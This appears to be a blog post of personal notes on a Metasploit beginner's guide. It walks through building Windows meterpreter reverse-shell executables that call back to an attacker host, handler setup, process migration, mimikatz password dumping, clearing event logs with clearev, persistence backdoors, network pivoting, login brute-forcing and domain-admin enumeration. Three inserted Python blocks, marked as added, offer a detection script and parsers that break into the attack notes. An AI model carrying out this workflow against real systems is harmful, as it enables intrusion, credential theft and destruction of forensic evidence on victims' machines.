No work today, so I sat in a dark room and read the 100-page book "Metasploit Novice Guide"; here I share my notes with everyone. Criticism is welcome, so we can learn and make progress together.
Metasploit Beginner's Guide
Notes: kali
0x01
The basic Metasploit file structure is as follows:
config: Metasploit environment configuration and database configuration information.
data: tools and payloads used by the penetration modules, a collection of third-party gadgets, user dictionaries and other data.
db: database information generated by Rails compilation for the MSF web framework.
documentation: user documentation and development documentation.
external: some basic Metasploit extension modules.
lib: some basic Metasploit classes and third-party module classes.
log: system information and other information written by Metasploit at runtime.
modules: Metasploit's system tool modules, including pre-exploitation auxiliary modules (auxiliary), exploitation modules (exploits), attack payloads (payloads), post-exploitation modules (post), NOP modules (nops) and encoding modules (encoders).
msfbinscan: offset address scanning of binary files.
msfconsole: Metasploit's basic command line, integrating all of the functions.
msfelfscan: offset address scanning of Linux ELF files.
msfmachscan: same function as msfelfscan.
msfpescan: offset address scanning of Windows PE format files.
msfvenom: combines the features of msfpayload and msfencode and replaces both, more efficiently.
plugins: Metasploit's third-party plug-in interface.
scripts: common Metasploit post-exploitation scripts; unlike the post modules, they need no post parameter or absolute path and can be run directly.
0x02
search: searches the Metasploit modules.
use: selects the payload or module you want to work with.
show options: shows the module's configurable settings.
info: shows all the detailed information about the module.
set: sets a basic option such as the target, for example set TARGET 1 or set SESSION 1.
back: returns from the current module so that a new one can be selected.
exit: compared with back, one returns and the other exits.
kill: kills a process.
0x03
During the scanning phase, start the PostgreSQL database so that scan results are easy to view.
search portscan
use
show options
run
0x04
Generating payloads with msfvenom
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.105.1 lport=8099 -f exe > shell.exe
0x05
msfvenom encoded payload generation
HTTPS payload: gets through firewall rules.
payload_inject: injects another payload into the original session and returns a new session ID.
Auto RDP port: automatically opens port 3389; any other port can be opened the same way.
In-memory injection: injects into RAM.
0x06
Android payload generation
0x07
Cobalt Strike
A GUI penetration testing tool built on the Metasploit framework.
0x08
Meterpreter commands are divided into:
1. Core commands
2. Stdapi file commands
3. Stdapi network commands
4. Stdapi user interface commands
5. Stdapi webcam commands
6. Stdapi file system commands
7. Priv elevation commands
8. Priv password database commands
9. Priv timestomp commands
Attacking Win7:
Step 1:
root@kali:/var/www/html# msfvenom -p windows/meterpreter/reverse_https lhost=192.168.105.1 lport=6745 -f exe > win.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 502 bytes
Final size of exe file: 73802 bytes
Step 2:
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.105.1
msf exploit(handler) > set LPORT 6745
msf exploit(handler) > sessions
msf exploit(handler) > sessions -i 1
migrate command
Migrates from the current process on the target machine into another process.
meterpreter > getpid
Current pid: 3232
meterpreter > run post/windows/manage/migrate
[*] Running module against PC-20170804GGMB
[*] Current server process: win.exe (3232)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3356
[+] Successfully migrated to process 3356
Script commands:
run checkvm: checks whether the remote host is a virtual machine or a physical host.
run getgui: command to add a user.
run vnc: view the other side's desktop.
run packetrecorder -i 0: capture all traffic of the target system and record the packets.
load mimikatz
clearev: clears the event log.
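What the migrate transcript and clearev above look like from the defender's side, as an added Python example that is not part of the original notes: a small detection run over constructed, hypothetical Windows event records. It assumes Sysmon's exported field names for Event ID 1 (process create) and Event ID 8 (CreateRemoteThread), and the Security log's Event ID 1102 (audit log cleared); the host names, paths and pids are constructed to mirror the transcript, and the allow-list of benign thread sources is a starting baseline, not a verified one.

```python
"""Added example (not from the original notes): detection logic for the
meterpreter actions shown above, process migration (run post/windows/manage/migrate)
and clearev, applied to constructed Windows event records.

Assumed field names follow Sysmon's exported fields (Event ID 1 = process create,
Event ID 8 = CreateRemoteThread); Security Event ID 1102 = audit log cleared.
The records themselves are constructed samples, not real telemetry."""
from dataclasses import dataclass

# Constructed sample telemetry mirroring the transcript: win.exe (pid 3232)
# spawns notepad.exe (pid 3356), injects a thread into it, then the log is cleared.
# The last record is a benign remote thread from csrss.exe, to exercise the allow-list.
SAMPLE_EVENTS = [
    {"channel": "Sysmon", "event_id": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ProcessId": 3356, "ParentImage": r"C:\Users\victim\win.exe", "ParentProcessId": 3232},
    {"channel": "Sysmon", "event_id": 8, "SourceImage": r"C:\Users\victim\win.exe",
     "SourceProcessId": 3232, "TargetImage": r"C:\Windows\System32\notepad.exe",
     "TargetProcessId": 3356},
    {"channel": "Security", "event_id": 1102, "SubjectUserName": "victim"},
    {"channel": "Sysmon", "event_id": 8, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "SourceProcessId": 600, "TargetImage": r"C:\Windows\explorer.exe",
     "TargetProcessId": 1500},
]

# Windows components that legitimately create threads in other processes.
# Assumption: a starting baseline to be tuned per environment.
BENIGN_REMOTE_THREAD_SOURCES = {"csrss.exe", "lsass.exe", "svchost.exe", "wininit.exe"}


@dataclass
class Alert:
    rule: str
    detail: str


def image_name(path: str) -> str:
    """Return the lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_migration(events):
    """Flag CreateRemoteThread (Sysmon 8) from a non-allow-listed source into another
    process, which is what migrate is from the endpoint's point of view. If the same
    source also spawned the target (Sysmon 1), mark the spawn-and-migrate pattern
    that the post/windows/manage/migrate transcript shows."""
    spawned = {e["ProcessId"]: e["ParentProcessId"]
               for e in events if e["channel"] == "Sysmon" and e["event_id"] == 1}
    alerts = []
    for e in events:
        if e["channel"] != "Sysmon" or e["event_id"] != 8:
            continue
        src = image_name(e["SourceImage"])
        if src in BENIGN_REMOTE_THREAD_SOURCES:
            continue
        detail = (f"{src} ({e['SourceProcessId']}) -> "
                  f"{image_name(e['TargetImage'])} ({e['TargetProcessId']})")
        if spawned.get(e["TargetProcessId"]) == e["SourceProcessId"]:
            detail += " [source also spawned target]"
        alerts.append(Alert("remote_thread_injection", detail))
    return alerts


def detect_log_clear(events):
    """Security Event ID 1102 is written when the audit log is cleared (clearev)."""
    return [Alert("audit_log_cleared", f"by {e.get('SubjectUserName', 'unknown')}")
            for e in events if e["channel"] == "Security" and e["event_id"] == 1102]


def run_detections(events):
    """Run every rule and return the combined alert list."""
    return detect_migration(events) + detect_log_clear(events)


if __name__ == "__main__":
    for a in run_detections(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.detail}")
```

The spawn-and-migrate correlation is the useful part: a lone CreateRemoteThread from an unknown binary is already suspicious, but a binary that first spawns notepad.exe and then injects into it is the exact sequence the migrate module prints above, and the 1102 event right after it is the trace clearev leaves even when the other logs are gone.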
0x09
One. Getting Meterpreter.
1. First generate an executable file:
root@kali:~# msfvenom -p windows/meterpreter/reverse_https lhost=192.168.105.1 lport=8934 -f exe > She.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 543 bytes
Final size of exe file: 73802 bytes

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.1.105
LHOST => 192.168.1.105
msf exploit(handler) > set LPORT 8934
LPORT => 8934
msf exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
Two. Basic Meterpreter tunnelling and proxying
portfwd is a basic port forward provided by meterpreter: portfwd can forward a single port back to the local machine and listen on it.
pivot is the most commonly used form of proxying in meterpreter; it lets you easily route your machine into the victim's internal network. Below is how pivot is used: route add adds a temporary routing entry.
Add a route in metasploit so that access to 10.1.1.129 goes through meterpreter session 1.
meterpreter > route
meterpreter > run get_local_subnets    (view the subnet)
10.1.1.129 255.255.255.255 1    this is our subnet
msf exploit(handler) > route add 10.1.1.129 255.255.255.255 1    add the route locally
route print
===============================
Subnet       Netmask           Gateway
10.1.1.129   255.255.255.255   Session 1
If you want to proxy the whole 10.1.1.129/24 network through session 1, write it the same way with a /24 netmask.
Now that the pivot is configured, scanning 10.1.1.129 from msf (db_nmap) or accessing it (psexec module, ssh module) goes through session 1. What if you want other applications to use this proxy? Metasploit's socks4a module can provide a listening tunnel for other applications to use.
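To make the route table above concrete, here is an added Python example, not from the notes and not Metasploit's own code, that models how a route entry of subnet, netmask and session decides which session a destination address is reached through, including the /24 variant the text mentions. It assumes longest-prefix matching (the most specific route wins), the usual routing-table rule; the addresses are the ones from the transcript.

```python
"""Added example (not from the original notes, not Metasploit's own code):
a model of the meterpreter route table ("route add <subnet> <netmask> <session>")
that decides which session a destination address is sent through.
Assumption: the most specific matching route wins (longest-prefix match);
a destination with no matching route is reached directly, not through a session."""
import ipaddress


def add_route(table, subnet, netmask, session):
    """Mirror 'route add 10.1.1.129 255.255.255.255 1': store the network and the session."""
    network = ipaddress.IPv4Network((subnet, netmask), strict=False)
    table.append((network, session))
    return table


def route_print(table):
    """Render the table in the same three-column shape as 'route print'."""
    lines = ["Subnet           Netmask          Gateway"]
    for network, session in table:
        lines.append(f"{str(network.network_address):<16} "
                     f"{str(network.netmask):<16} Session {session}")
    return "\n".join(lines)


def select_session(table, dest):
    """Return the session id a destination routes through, or None for direct access."""
    addr = ipaddress.IPv4Address(dest)
    best = None
    for network, session in table:
        if addr in network and (best is None or network.prefixlen > best[0].prefixlen):
            best = (network, session)
    return best[1] if best else None


def demo():
    """Walk through the transcript: the /32 route first, then the /24 form."""
    table = add_route([], "10.1.1.129", "255.255.255.255", 1)
    # With only the /32 route, 10.1.1.129 goes via session 1 but 10.1.1.130 is direct.
    only_host = (select_session(table, "10.1.1.129"), select_session(table, "10.1.1.130"))
    # The /24 form: the whole 10.1.1.0/24 network now goes via session 1, 10.1.2.x does not.
    add_route(table, "10.1.1.129", "255.255.255.0", 1)
    whole_net = (select_session(table, "10.1.1.130"), select_session(table, "10.1.2.5"))
    return only_host, whole_net


if __name__ == "__main__":
    print(route_print(add_route([], "10.1.1.129", "255.255.255.255", 1)))
    print(demo())
```

The point to take from the /32 versus /24 comparison is that the netmask, not the address, decides how much of the network is pulled through the session; a host route covers one machine, and a /24 silently sends every scan and login attempt in that range through the pivot.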
First load socks4a and configure the listening port:
msf > use auxiliary/server/socks4a
msf auxiliary(socks4a) > show options
Module options (auxiliary/server/socks4a):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT                   yes       The port to listen on.
Auxiliary action:
   Name   Description
   ----   -----------
   Proxy
msf auxiliary(socks4a) > exploit -y
[*] Auxiliary module execution completed
msf auxiliary(socks4a) >
[*] Starting the SOCKS4A proxy server
To view the listening port:
msf auxiliary(socks4a) > netstat -ano | grep "1080"
[*] exec: netstat -ano | grep "1080"
tcp        0      0 0.0.0.0:1080            0.0.0.0:*               LISTEN      off (0.00/0/0)
The port is listening; next configure proxychains.
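As an added example (not from the notes), a Python parser for the `show options` table printed above, so that a script can check which required options are still unset before a module is run. The sample text is constructed from the socks4a transcript; SRVPORT is deliberately left blank to exercise the missing-value case, and the column layout is assumed to follow msfconsole's aligned-header format as shown.

```python
"""Added example (not from the original notes): parse msfconsole's 'show options'
table into a dictionary and report required options that still have no value.
The sample below is constructed from the socks4a transcript; SRVPORT is left
blank on purpose so the missing-required check has something to find."""

SAMPLE_SHOW_OPTIONS = """\
Module options (auxiliary/server/socks4a):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT                   yes       The port to listen on.

Auxiliary action:

   Name   Description
   ----   -----------
   Proxy
"""

HEADERS = ("Name", "Current Setting", "Required", "Description")


def _cell(row, starts, k):
    """Slice column k out of a row using the header column offsets."""
    end = starts[k + 1] if k + 1 < len(starts) else len(row)
    return row[starts[k]:end].strip()


def parse_show_options(text):
    """Return {option: {"current", "required", "description"}} from the options table.
    Columns are located from the header line, so descriptions containing spaces
    and blank 'Current Setting' cells are both handled."""
    lines = text.splitlines()
    options = {}
    for i, line in enumerate(lines):
        if not (line.lstrip().startswith("Name") and "Current Setting" in line):
            continue
        starts = [line.index(h) for h in HEADERS]
        for row in lines[i + 2:]:          # i + 1 is the dashed underline
            if not row.strip():
                break                      # a blank line ends the table
            row = row.ljust(starts[-1] + 1)  # pad short rows so every slice exists
            options[_cell(row, starts, 0)] = {
                "current": _cell(row, starts, 1),
                "required": _cell(row, starts, 2).lower() == "yes",
                "description": _cell(row, starts, 3),
            }
        break
    return options


def missing_required(options):
    """Names of required options with no value; run the module only when this is empty."""
    return sorted(name for name, o in options.items() if o["required"] and not o["current"])


if __name__ == "__main__":
    opts = parse_show_options(SAMPLE_SHOW_OPTIONS)
    for name, o in opts.items():
        print(f"{name}: {o['current'] or '<unset>'} (required={o['required']})")
    print("missing:", missing_required(opts))
```

Splitting rows on runs of spaces would collapse the blank SRVPORT cell and shift "yes" into the Current Setting column, which is why the parser slices by the header offsets instead.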
0x10
Maintaining access. The Metasploit backdoors are not easy to use; to keep control of access we recommend an external third-party backdoor.
Backdoors that come with MSF:
persistence
metsvc
scheduleme & schtasks
0x11
Information gathering
To gather information well and view the results clearly, do the following three things when starting msfconsole: start the database, check the database, connect to the database.
Port scan: search portscan
Currently two scan modes: SYN/TCP
smb_version identifies the Windows version:
use auxiliary/scanner/smb/smb_version
mssql_ping: by default MSSQL listens on port 1433 or on a random TCP port; if it is listening on a random port, you can query over UDP on port 1433 to find out which port is being listened on.
use auxiliary/scanner/mssql/mssql_ping
ssh_version identifies the SSH software version:
auxiliary/scanner/ssh/ssh_version
ftp_version finds FTP servers in the target network.
Brute force
Kali's bundled dictionary path:
/usr/share/metasploit-framework/data/wordlists
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/http/tomcat_mgr_login
Assuming the Tomcat account password is successfully brute-forced, a shell can then be obtained with:
exploit/multi/http/tomcat_mgr_deploy
Common Metasploit service probing modules:
Port scan
auxiliary/scanner/portscan
scanner/portscan/ack
scanner/portscan/ftpbounce    FTP bounce port scan
scanner/portscan/syn
scanner/portscan/tcp
scanner/portscan/xmas    TCP "Xmas" port scan
SMB scan
auxiliary/scanner/smb/smb_enumusers    SMB enumeration
auxiliary/scanner/smb/pipe_dcerpc_auditor    returns DCERPC information
auxiliary/scanner/smb/smb2    scans for the SMB2 protocol
auxiliary/scanner/smb/smb_enumshares    scans SMB shared files
auxiliary/scanner/smb/smb_enumusers    enumerates users on the system
auxiliary/scanner/smb/smb_login    SMB login
use windows/smb/psexec    SMB login
auxiliary/scanner/smb/smb_lookupsid    scans the users of the group
auxiliary/scanner/smb/smb_version    scans the system version
MSSQL scan
admin/mssql/mssql_enum    MSSQL enumeration
admin/mssql/mssql_exec    MSSQL command execution
admin/mssql/mssql_sql    MSSQL query
scanner/mssql/mssql_login    MSSQL login tool
There is also an mssql_payload module.
SMTP scan
auxiliary/scanner/smtp/smtp_enum    SMTP enumeration
auxiliary/scanner/smtp/smtp_version    scans SMTP versions
SNMP scan
auxiliary/scanner/snmp/community    scans devices through SNMP
scanner/snmp/community    SNMP scan
SSH scan
auxiliary/scanner/ssh/ssh_login    SSH login
auxiliary/scanner/ssh/ssh_login_pubkey    SSH public key authentication login
auxiliary/scanner/ssh/ssh_version    SSH version scan
Telnet scan
auxiliary/scanner/telnet/telnet_login    Telnet login
auxiliary/scanner/telnet/telnet_version    Telnet version
TFTP scan
auxiliary/scanner/tftp/tftpbrute    scans TFTP files
scanner/ftp/anonymous    FTP version scan
ARP scan
auxiliary/scanner/discovery/arp_sweep
auxiliary/scanner/discovery/udp_probe    scans hosts for UDP services
auxiliary/scanner/discovery/udp_sweep    detects commonly used UDP services
auxiliary/sniffer/psnuffle    password sniffer
scanner/vnc/vnc_none_auth    scans for VNC services with no authentication
Web server information scanning modules
Under auxiliary/scanner/http: http_version, open_proxy, robots_txt, frontpage_login, tomcat_administration, tomcat_utf8_traversal, options, drupal_views_user_enum, scraper, svn_scanner, trace, vhost_scanner, webdav_internal_ip, webdav_scanner, webdav_website_content
File directory scanning modules
Under auxiliary/scanner/http: backup_file, brute_dirs, copy_of_file, dir_listing, dir_scanner, dir_webdav_unicode_bypass, file_same_name_dir, files_dir, http_put, ms09_020_webdav_unicode_bypass, prev_dir_same_name_file, replace_ext, soap_xml, trace_axd, verb_auth_bypass
auxiliary/scanner/dos/http/apache_range_dos
Web application scanning modules
auxiliary/scanner/http/blind_sql_query
auxiliary/scanner/http/error_sql_injection
auxiliary/scanner/http/http_traversal
auxiliary/scanner/http/rails_mass_assignment
exploit/multi/http/lcms_php_exec
0x12
Reverse Meterpreter
Try to take the 2012 server
Try privilege escalation with the current account
net user /domain
net group "Domain Computers" /domain
net group "Domain Admins" /domain    view the domain admins
net localgroup administrators
net view /domain
Analyse the information and obtain permissions on one server
mimikatz: grab plaintext passwords
View the details of the captured users: net user xxx /domain
Try domain token impersonation
Use SMB delivery
1. Use the two user accounts already obtained to scan quickly
2. smb_login scan
3. Port forwarding into the intranet
4. meterpreter port forwarding
5. MSF socks4a forwarding
https://www.zybuluo.com/jasun/note/841229 Good, I'm hungry and want to eat.
Metasploit Quick Start